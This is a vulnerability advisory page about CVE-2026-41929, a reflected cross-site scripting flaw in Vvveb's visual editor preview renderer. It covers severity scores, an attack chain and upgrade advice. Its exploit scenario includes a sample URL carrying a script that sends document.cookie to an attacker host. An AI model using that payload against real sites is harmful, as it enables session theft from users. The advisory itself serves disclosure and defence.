Skip to main content

Vvveb CVE-2026-41929

| EUVD-2026-28459 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-07 VulnCheck
XSS Vvveb
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

4
CVSS changed
May 07, 2026 - 22:22 NVD
6.1 (MEDIUM) 5.1 (MEDIUM)
Source Code Evidence Fetched
May 07, 2026 - 22:04 vuln.today
Analysis Generated
May 07, 2026 - 22:04 vuln.today
CVE Published
May 07, 2026 - 21:08 nvd
MEDIUM 6.1

DescriptionCVE.org

Vvveb before 1.0.8.2 contains an unauthenticated reflected cross-site scripting vulnerability in the visual editor preview renderer that allows attackers to execute arbitrary JavaScript by manipulating the r query parameter and _component_ajax POST parameter. Attackers can craft a malicious link or auto-submitted form that causes victims to execute attacker-controlled JavaScript in the context of the Vvveb origin, as the gating function isEditor() performs no session, role, or token verification and the view handler injects raw HTML POST body content without sanitization.

AnalysisAI

Unauthenticated reflected cross-site scripting (XSS) in Vvveb before 1.0.8.2 allows remote attackers to execute arbitrary JavaScript in the context of the Vvveb origin by manipulating the r query parameter and _component_ajax POST parameter in the visual editor preview renderer. The vulnerability exploits the absence of session, role, or token verification in the isEditor() gating function combined with unsanitized injection of POST body content, requiring only user interaction to trigger but affecting all versions prior to 1.0.8.2. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft malicious URL with XSS payload
Delivery
Send phishing email or inject link
Exploit
User clicks link in Vvveb context
Install
isEditor() bypasses authentication check
C2
View handler renders unsanitized POST/query content
Execute
JavaScript executes in user browser
Impact
Attacker steals session cookie and account access
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The vulnerability requires (1) the visual editor preview renderer endpoint to be accessible to unauthenticated users, which is the default Vvveb configuration; (2) the r query parameter and _component_ajax POST parameter to be present in the request; and (3) the isEditor() gating function to perform no session, role, or token verification, meaning attackers do not need valid credentials or authentication. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C) indicates network-accessible, low-complexity, unauthenticated exploitation that requires user interaction and crosses security boundaries (Scope:Changed), yielding low confidentiality and integrity impact with no availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL such as http://victim-vvveb.com/editor?r=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> or an HTML form that auto-submits with a _component_ajax POST body containing raw HTML payload. When a Vvveb user is tricked into clicking the link or visiting a page with the auto-submitted form (via phishing, social engineering, or reflected injection in a search parameter), the isEditor() function allows the request through without authentication verification, and the view handler renders the attacker's JavaScript in the user's browser context, stealing session cookies, performing unauthorized actions, or harvesting sensitive data from the page.
Remediation Upgrade immediately to Vvveb 1.0.8.2 or later to apply the vendor-released patch. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-41929 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy